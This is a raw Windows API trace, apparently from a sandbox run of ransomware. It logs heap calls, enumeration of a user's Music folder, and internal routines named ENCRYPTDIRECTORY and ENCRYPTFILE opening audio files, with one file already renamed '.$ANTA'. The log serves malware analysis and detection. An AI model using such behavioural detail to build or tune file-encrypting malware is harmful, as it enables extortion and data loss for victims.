ftLastAccessTime.dwLowDateTime=0x121eb3cb, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1225d9d2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x11780, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="ymTK.m4a.$ANTA", cAlternateFileName="YMTKM4~1.$AN")) returned 1 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.490] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.490] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.491] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.491] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.491] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2770, ftCreationTime.dwHighDateTime=0x144e8e8, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2770, ftLastWriteTime.dwLowDateTime=0x43e9350, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="", cAlternateFileName="ﶈмńဓ+\x10")) returned 0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.491] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0117.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.492] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.492] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0117.492] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0117.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0117.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.535] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0117.535] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.535] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b")) returned 0x10 [0117.535] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d1a2630, ftCreationTime.dwHighDateTime=0x1d5eeb1, ftLastAccessTime.dwLowDateTime=0x13182270, ftLastAccessTime.dwHighDateTime=0x1d5ee54, ftLastWriteTime.dwLowDateTime=0x13182270, ftLastWriteTime.dwHighDateTime=0x1d5ee54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2f8, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0117.535] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d1a2630, ftCreationTime.dwHighDateTime=0x1d5eeb1, ftLastAccessTime.dwLowDateTime=0x13182270, ftLastAccessTime.dwHighDateTime=0x1d5ee54, ftLastWriteTime.dwLowDateTime=0x13182270, ftLastWriteTime.dwHighDateTime=0x1d5ee54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2f8, cFileName="..", cAlternateFileName="")) returned 1 [0117.535] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ef1cc0, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x5d4774b0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0x5d4774b0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x17844, dwReserved0=0x0, dwReserved1=0x43ca2f8, cFileName="caX1anHBaP9sA34Tftcq.mp3", cAlternateFileName="CAX1AN~1.MP3")) returned 1 [0117.535] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e1cd10, ftCreationTime.dwHighDateTime=0x1d5ea0e, ftLastAccessTime.dwLowDateTime=0x70eb26c0, ftLastAccessTime.dwHighDateTime=0x1d5e7df, ftLastWriteTime.dwLowDateTime=0x70eb26c0, ftLastWriteTime.dwHighDateTime=0x1d5e7df, nFileSizeHigh=0x0, nFileSizeLow=0x43ef, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="TFaPhwZGXS0zM.wav", cAlternateFileName="TFAPHW~1.WAV")) returned 1 [0117.535] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2520, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x17, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﮨмńဓ+\x10")) returned 0 [0117.535] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0117.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|caX1anHBaP9sA34Tftcq.mp3|TFaPhwZGXS0zM.wav", cchCount1=43, lpString2="", cchCount2=0) returned 3 [0117.536] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0117.536] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ef1cc0, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x5d4774b0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0x5d4774b0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x17844, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="caX1anHBaP9sA34Tftcq.mp3", cAlternateFileName="CAX1AN~1.MP3")) returned 0x41ac500 [0117.536] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0117.536] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0117.536] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0117.536] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0117.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca640, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0117.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\cax1anhbap9sa34tftcq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0117.537] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0117.537] CloseHandle (hObject=0x298) returned 1 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 